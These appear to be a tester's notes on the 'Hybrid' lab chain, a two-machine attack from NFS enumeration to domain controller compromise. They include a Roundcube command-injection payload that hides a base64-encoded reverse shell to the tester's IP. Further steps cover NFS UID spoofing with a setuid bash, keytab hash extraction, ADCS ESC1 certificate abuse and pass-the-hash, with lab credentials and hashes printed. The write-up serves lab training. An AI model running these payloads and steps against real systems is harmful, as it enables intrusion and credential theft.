Hybrid (Chain)

This is not a writeup, just my notes about the machine.

Machine information

Operating System: Windows

Chain: True (2 Machines)

Credentials

Username

Password

Method

Scope

admin@hybrid.vl

Duckling21

Backup File

Roundcube Webmail

peter.turner@hybrid.vl

PeterIstToll!

Backup File

Roundcube Webmail

✅ Valid Usernames

peter.turner@hybrid.vl

🔑 Passwords list

Duckling21
PeterIstToll!

Information Gathering

Nmap

nmap -p- -A --open -T5 -Pn -n -oN ext_hybrid_tcp_allports -vvv --min-rate 3000 10.10.141.149-150
#10.10.141.149
53/tcp    open  tcpwrapped syn-ack
135/tcp   open  tcpwrapped syn-ack
139/tcp   open  tcpwrapped syn-ack
445/tcp   open  tcpwrapped syn-ack
3389/tcp  open  tcpwrapped syn-ack
9389/tcp  open  tcpwrapped syn-ack
49667/tcp open  tcpwrapped syn-ack
49670/tcp open  tcpwrapped syn-ack
#10.10.141.150
22/tcp    open  tcpwrapped syn-ack
25/tcp    open  tcpwrapped syn-ack
80/tcp    open  tcpwrapped syn-ack
110/tcp   open  tcpwrapped syn-ack
111/tcp   open  tcpwrapped syn-ack
143/tcp   open  tcpwrapped syn-ack
993/tcp   open  tcpwrapped syn-ack
995/tcp   open  tcpwrapped syn-ack
2049/tcp  open  nfs
35407/tcp open  tcpwrapped syn-ack

Initial Enumeration

Enumerating the network file system

showmount -e 10.10.141.150
Export list for 10.10.141.150:
/opt/share *

Mounting the network file system

mkdir share
sudo mount -t nfs 10.10.141.150:/opt/share share -o nolock
cp share/backup.tar.gz .
tar -xvf backup.tar.gz

Discovering leaked credentials into a files.

tree
.
├── backup.tar.gz
├── etc
│   ├── dovecot
│   │   └── dovecot-users
│   ├── passwd
│   ├── postfix
│   │   └── main.cf
│   └── sssd
│       └── sssd.conf
└── opt
    └── certs
        └── hybrid.vl
            ├── fullchain.pem
            └── privkey.pem

File: etc/dovecot/dovecot-users
-------------------------------
admin@hybrid.vl:{plain}Duckling21
peter.turner@hybrid.vl:{plain}PeterIstToll!

RoudCube enumeration

Discovering a vulnerable pluging

Roundcube Markasjunk Plugin Command Injection Vulnerability Analysis - CyberthintCyberthint

Roundcube version 1.6.1 and prior has a vulnerability in markasjunk plugin allows attackers that send a specially crafted identity email address to cause the plugin to execute arbitrary code.

Exploitation

Modifying the user's email field to abuse the RCE.

peter.turner&echo${IFS}L2Jpbi9zaCAtaSA+JiAvZGV2L3RjcC8xMC44LjUuNDgvMTIzNCAwPiYx${IFS}|${IFS}base64${IFS}-d${IFS}|bash&@hybrid.vl

Lateral Movement to peter.turner

Attack Path:

To escalate privileges, the tester leveraged an NFS share misconfiguration that allowed file manipulation using the www-data account. The exploitation flow was as follows:

UID Spoofing: On the tester's machine, a local user was created with the same UID as the target user peter.turner@hybrid.vl (UID: 902601108) to impersonate them over the NFS share:
```
sudo useradd -u 902601108 peter.turner@hybrid.vl --badname -p 'password123'
```
Abusing NFS Share with www-data: The compromised www-data account had write access to a shared NFS directory. A custom Bash binary was placed into the NFS share from this account.
Setting the SetUID Bit (on Attacker's Machine): From the attacker-controlled machine (where the spoofed user existed), the tester moved the Bash binary to a temporary directory (e.g., /tmp), modified its permissions to include the setuid bit, and moved it back into the NFS directory:
```
chmod u+s bash
mv bash /path/to/nfs/share/
```
Privilege Escalation: Back on the target machine, the www-data account executed the Bash binary with elevated privileges using the -p flag:
```
./bash -p
```
This resulted in a shell running with the effective UID of peter.turner@hybrid.vl, allowing privilege escalation.

Privilege Escalation to root on mail01

Finding a Keepass database

Inside the peter.turner@hybrid.vl 's directory there was a keepass database file. I moved to my machine and extracted the credentials due reusing credentials.

❯ kpcli --kdb=passwords.kdbx
Provide the master password: *************************
kpcli:/> cd hybrid.vl
kpcli:/hybrid.vl> ls
=== Entries ===
0. domain                                                                 
1. mail                                                   mail01.hybrid.vl
kpcli:/hybrid.vl> show 0

Title: domain
Uname: peter.turner
 Pass: b0cwR+G4Dzl_rw
  URL: 
Notes:

Abusing the sudoers configuration

peter.turner@hybrid.vl@mail01:~$ sudo -l
Matching Defaults entries for peter.turner@hybrid.vl on mail01:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
    use_pty

User peter.turner@hybrid.vl may run the following commands on mail01:
    (ALL) ALL
peter.turner@hybrid.vl@mail01:~$ sudo su
root@mail01:/home/peter.turner@hybrid.vl#

Compromising Domain controller

Discovering Domain Computers is vulnerable to ESC1

❯ certipy-ad find -u peter.turner -p 'b0cwR+G4Dzl_rw' -dc-ip 10.10.219.181 -vulnerable -stdout
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[*] Trying to get CA configuration for 'hybrid-DC01-CA' via CSRA
[!] Got error while trying to get CA configuration for 'hybrid-DC01-CA' via CSRA: CASessionError: code: 0x80070005 - E_ACCESSDENIED - General access denied error.
[*] Trying to get CA configuration for 'hybrid-DC01-CA' via RRP
[!] Failed to connect to remote registry. Service should be starting now. Trying again...
[*] Got CA configuration for 'hybrid-DC01-CA'
[*] Enumeration output:
Certificate Authorities
  0
    CA Name                             : hybrid-DC01-CA
    DNS Name                            : dc01.hybrid.vl
    Certificate Subject                 : CN=hybrid-DC01-CA, DC=hybrid, DC=vl
    Certificate Serial Number           : 7D22C8F2760BC48A4E57B5E94984304B
    Certificate Validity Start          : 2023-06-17 14:04:39+00:00
    Certificate Validity End            : 2125-04-03 23:35:28+00:00
    Web Enrollment                      : Disabled
    User Specified SAN                  : Disabled
    Request Disposition                 : Issue
    Enforce Encryption for Requests     : Enabled
    Permissions
      Owner                             : HYBRID.VL\Administrators
      Access Rights
        ManageCertificates              : HYBRID.VL\Administrators
                                          HYBRID.VL\Domain Admins
                                          HYBRID.VL\Enterprise Admins
        ManageCa                        : HYBRID.VL\Administrators
                                          HYBRID.VL\Domain Admins
                                          HYBRID.VL\Enterprise Admins
        Enroll                          : HYBRID.VL\Authenticated Users
Certificate Templates
  0
    Template Name                       : HybridComputers
    Display Name                        : HybridComputers
    Certificate Authorities             : hybrid-DC01-CA
    Enabled                             : True
    Client Authentication               : True
    Enrollment Agent                    : False
    Any Purpose                         : False
    Enrollee Supplies Subject           : True
    Certificate Name Flag               : EnrolleeSuppliesSubject
    Enrollment Flag                     : None
    Private Key Flag                    : 16842752
    Extended Key Usage                  : Client Authentication
                                          Server Authentication
    Requires Manager Approval           : False
    Requires Key Archival               : False
    Authorized Signatures Required      : 0
    Validity Period                     : 100 years
    Renewal Period                      : 6 weeks
    Minimum RSA Key Length              : 4096
    Permissions
      Enrollment Permissions
        Enrollment Rights               : HYBRID.VL\Domain Admins
                                          HYBRID.VL\Domain Computers
                                          HYBRID.VL\Enterprise Admins
      Object Control Permissions
        Owner                           : HYBRID.VL\Administrator
        Write Owner Principals          : HYBRID.VL\Domain Admins
                                          HYBRID.VL\Enterprise Admins
                                          HYBRID.VL\Administrator
        Write Dacl Principals           : HYBRID.VL\Domain Admins
                                          HYBRID.VL\Enterprise Admins
                                          HYBRID.VL\Administrator
        Write Property Principals       : HYBRID.VL\Domain Admins
                                          HYBRID.VL\Enterprise Admins
                                          HYBRID.VL\Administrator
    [!] Vulnerabilities
      ESC1                              : 'HYBRID.VL\\Domain Computers' can enroll, enrollee supplies subject and template allows client authentication

Extracting the Compromised Computer NT Hash to abuse the ESC1

python3 keytabextract.py /home/Intrusionz3r0/Documents/Hybrid/krb5.keytab
[*] RC4-HMAC Encryption detected. Will attempt to extract NTLM hash.
[*] AES256-CTS-HMAC-SHA1 key found. Will attempt hash extraction.
[*] AES128-CTS-HMAC-SHA1 hash discovered. Will attempt hash extraction.
[+] Keytab File successfully imported.
	REALM : HYBRID.VL
	SERVICE PRINCIPAL : MAIL01$/
	NTLM HASH : 0f916c5246fdbc7ba95dcef4126d57bd
	AES-256 HASH : eac6b4f4639b96af4f6fc2368570cde71e9841f2b3e3402350d3b6272e436d6e
	AES-128 HASH : 3a732454c95bcef529167b6bea476458

Abusing the ESC1 to compromise domain controler.

❯ certipy-ad req -u 'MAIL01$' -hashes :0f916c5246fdbc7ba95dcef4126d57bd -dc-ip 10.10.219.181 -ca hybrid-DC01-CA -template HybridComputers -upn Administrator -key-size 4096 2>/dev/null
[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 11
[*] Got certificate with UPN 'Administrator'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'administrator.pfx'

Requesting administrator's Ticket Granting ticket TGT

❯ certipy-ad auth -username Administrator -dc-ip 10.10.219.181 -pfx administrator.pfx -domain hybrid.vl
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Using principal: administrator@hybrid.vl
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@hybrid.vl': aad3b435b51404eeaad3b435b51404ee:60701e8543c9f6db1a2af3217386d3dc

Obtaining a shell as Administrator on DC01

❯ impacket-wmiexec hybrid.vl/Administrator@10.10.219.181 -hashes :60701e8543c9f6db1a2af3217386d3dc
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>whoami
hybrid\administrator

C:\>hostname
dc01
C:\>

Last updated 6 months ago

hashtagMachine information

hashtagCredentials

hashtagInformation Gathering

hashtagNmap

hashtagInitial Enumeration

hashtagEnumerating the network file system

hashtagMounting the network file system

hashtagDiscovering leaked credentials into a files.

hashtagRoudCube enumeration

hashtagDiscovering a vulnerable pluging

hashtagExploitation

hashtagModifying the user's email field to abuse the RCE.

hashtagLateral Movement to peter.turner

hashtagAbusing UID Spoofing and NFS Share

hashtagAttack Path:

hashtagPrivilege Escalation to root on mail01

hashtagFinding a Keepass database

hashtagAbusing the sudoers configuration

hashtagCompromising Domain controller

hashtagDiscovering Domain Computers is vulnerable to ESC1

hashtagExtracting the Compromised Computer NT Hash to abuse the ESC1

hashtagAbusing the ESC1 to compromise domain controler.

hashtagRequesting administrator's Ticket Granting ticket TGT

hashtagObtaining a shell as Administrator on DC01